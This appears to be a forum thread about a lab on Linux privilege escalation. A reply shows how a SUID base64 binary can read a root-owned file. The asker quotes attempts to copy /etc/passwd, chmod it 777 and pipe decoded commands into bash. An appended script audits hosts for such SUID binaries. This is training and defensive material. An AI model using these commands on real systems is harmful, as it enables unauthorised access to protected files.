gwenael
3 hours ago
Solved

Privilege Escalation: Linux – Demonstrate Your Skills

Hello,

I’m doing the Lab "Privilege Escalation: Linux – Demonstrate Your Skills".

I’m stuck on the second part regarding FILE-SRV-DEV. With linPEAS I’ve found a file (/usr/bin/base64) with the SUID bit, but I don’t know if I am on the right track; when I try to use it I get "permission denied".

Am I on the right track by trying to use the base64 file?

Thanks in advance,

Gwenael

2 Replies

  • Hmm... on FILE-SRV-DEV you should just execute base64 on the file you want to see.
    With SUID rights you'll see the content (as base64), so just revert it :)

    merle@file-srv-dev:/tmp$ base64 /root/escalated.txt | base64 -d

    Privilege Escalation Completed -- FILE-SRV-DEV ✅

    Once you've done this, try to figure out how the server gets backed up and how you can interfere.

    • gwenael

      Thank you Steven,

      Simpler than what I was trying, which doesn’t work 🙂

      echo "cmd" | base64 (with cmd= cp /etc/passwd /tmp/passwd or chmod 777 /etc/passwd etc …)

      echo hashcmd | base64 -d | bash
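
From the defender's side, the finding in this thread (a SUID bit on a file-reading utility such as /usr/bin/base64) is something a host audit should catch. The script below is an added example, not part of the original posts; the `audit_suid` name and the `RISKY_READERS` list are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: list setuid files under the given directories and flag
# those whose name matches a utility that can print arbitrary file contents.

# Constructed, non-exhaustive list of file-reading utilities (assumption).
RISKY_READERS="base64 base32 cat head tail xxd od less more"

# audit_suid DIR...
# Prints one line per setuid regular file: "<FLAG|ok> <owner> <path>"
audit_suid() {
    find "$@" -xdev -type f -perm -4000 2>/dev/null |
    while IFS= read -r path; do
        name=$(basename "$path")
        # Owner matters: the utility reads files with this user's rights.
        owner=$(ls -ld "$path" | awk '{print $3}')
        case " $RISKY_READERS " in
            *" $name "*) verdict=FLAG ;;
            *)           verdict=ok ;;
        esac
        printf '%s %s %s\n' "$verdict" "$owner" "$path"
    done
}

# Stand-alone use: sh audit.sh /usr/bin /usr/local/bin
if [ "$#" -gt 0 ]; then
    audit_suid "$@"
fi
```

Only the process started from the SUID file runs with the owner's effective UID; a shell at the other end of a pipe keeps the caller's privileges. For flagged files that have no need for the bit, `chmod u-s` removes it.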